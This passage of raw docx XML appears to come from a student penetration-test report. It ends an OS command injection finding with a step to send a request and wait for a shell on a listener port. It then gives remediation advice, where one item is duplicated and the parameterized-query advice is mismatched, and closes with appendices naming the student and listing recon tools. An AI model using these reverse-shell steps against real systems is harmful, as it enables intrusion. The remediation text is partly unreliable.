      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D3AC9">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ListenerPort</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="69939220" w14:textId="346C6434" w:rsidR="005D3AC9" w:rsidRPr="005D3AC9" w:rsidRDefault="005D3AC9" w:rsidP="007B579A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Send the request to the server and wait for a connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126AB9DA" w14:textId="502E6D2A" w:rsidR="005D3AC9" w:rsidRPr="007B579A" w:rsidRDefault="005D3AC9" w:rsidP="005D3AC9"/>
    <w:p w14:paraId="1017166C" w14:textId="2728EA5F" w:rsidR="00646037" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156AAC1D" w14:textId="77777777" w:rsidR="00C566FB" w:rsidRPr="00C566FB" w:rsidRDefault="00C566FB" w:rsidP="00C566FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C566FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Input validation and sanitization</w:t>
      </w:r>
      <w:r w:rsidRPr="00C566FB">
        <w:t>: One of the most effective ways to prevent OS command injection is to ensure that all user inputs are validated and sanitized properly. This involves checking for the presence of special characters that could be used to execute OS commands and filtering them out. This can be done using a whitelist or blacklist approach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A75F0FB" w14:textId="77777777" w:rsidR="00C566FB" w:rsidRDefault="00C566FB" w:rsidP="00C566FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C566FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use of parameterized queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C566FB">
        <w:t xml:space="preserve"> Another recommended approach is to use parameterized queries when interacting with the database or other backend systems. This can help prevent attackers from injecting malicious commands into the query by ensuring that the query is pre-compiled and only allows for predefined parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A50F568" w14:textId="2314AC24" w:rsidR="00C566FB" w:rsidRPr="00C566FB" w:rsidRDefault="00C566FB" w:rsidP="00C566FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C566FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use of parameterized queries:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C566FB">
        <w:t xml:space="preserve"> Another recommended approach is to use parameterized queries when interacting with the database or other backend systems. This can help prevent attackers from injecting malicious commands into the query by ensuring that the query is pre-compiled and only allows for predefined parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0BAE1A" w14:textId="2DA74F53" w:rsidR="00646037" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5E52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>Additional Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382DC61D" w14:textId="20DA4150" w:rsidR="004956AA" w:rsidRDefault="004956AA" w:rsidP="004956AA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> – OS Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B93080" w14:textId="0A5111EB" w:rsidR="004956AA" w:rsidRDefault="00000000" w:rsidP="004956AA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:anchor=":~:text=OS%20command%20injection%20(also%20known,application%20and%20all%20its%20data" w:history="1">
        <w:r w:rsidR="004956AA" w:rsidRPr="00680A05">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/os-command-injection#:~:text=OS%20command%20injection%20(also%20known,application%20and%20all%20its%20data</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004956AA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705CFA28" w14:textId="6B1CB3B9" w:rsidR="004956AA" w:rsidRDefault="004956AA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42974504" w14:textId="39B7DD40" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="0052786E" w:rsidP="0052786E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc129370252"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix A: </w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Student Information</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2695"/>
        <w:gridCol w:w="6655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="360EAC87" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1B9173A8" w14:textId="11EC6E8A" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="0052786E" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Lindsay Von Tish</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5C730EB9" w14:textId="77777777" w:rsidTr="005264D0">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BFD8F3B" w14:textId="7A78F21D" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="0052786E" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="796CC29E" w14:textId="74207A79" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="0052786E" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>lmv9443@nyu.edu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D89D230" w14:textId="278F04B8" w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="005E496E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc129370253"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Appendix B: Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="34B4CA48" w14:textId="4DC61AE5" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc129370254"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2335"/>
        <w:gridCol w:w="7015"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="0A80666C" w14:textId="77777777" w:rsidTr="00AE6477">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2335" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F7CC08C" w14:textId="6B7167F9" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FF37948" w14:textId="63DDC162" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="4A212761"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2E04C29F" w14:textId="26613D55" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>BuiltWith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07AB1A6B" w14:textId="58A71CC4" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://builtwith.com/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5E2CF7DD"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7AE5F79A" w14:textId="4E7DD40C" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Get All URLs (GAU)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6358BBE4" w14:textId="06A76050" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/lc/gau</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5E0E215E"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7E2DB18C" w14:textId="38E60EE8" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>GoWitness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A014703" w14:textId="2B645394" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/sensepost/gowitness</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="2FDF1CCC"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5F2306D6" w14:textId="7CC3F79B" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Massscan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DCA2AF7" w14:textId="60053D65" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId15" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://github.com/robertdavidgraham/masscan</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="798151F2"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1D609A80" w14:textId="45C1C125" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E13D28E" w14:textId="75FA3463" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId16" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://nmap.org/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="1723B79C"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7131B23D" w14:textId="77BE5910" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Recon-ng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A8FBBC8" w14:textId="75821986" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId17" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://www.kali.org/tools/recon-ng/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="1E133AA2"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5A1FE669" w14:textId="03633235" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Shodan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D72E2D" w14:textId="0F4121F5" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId18" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://www.shodan.io/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="56657D9D"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62BD1ADD" w14:textId="001E303A" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>TheHarvester</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BBC6B1A" w14:textId="11778EFA" w:rsidR="00D70417" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId19" w:history="1">
              <w:r w:rsidRPr="005264D0">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://www.kali.org/tools/theharvester/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44029610" w14:textId="3243B99B" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00A34711" w:rsidP="00A34711">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B344852" w14:textId="629DCCB4" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00A34711">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc129370255"/>
      <w:r w:rsidRPr="005264D0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Vulnerability Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2335"/>
        <w:gridCol w:w="7015"/>
      </w:tblGrid>
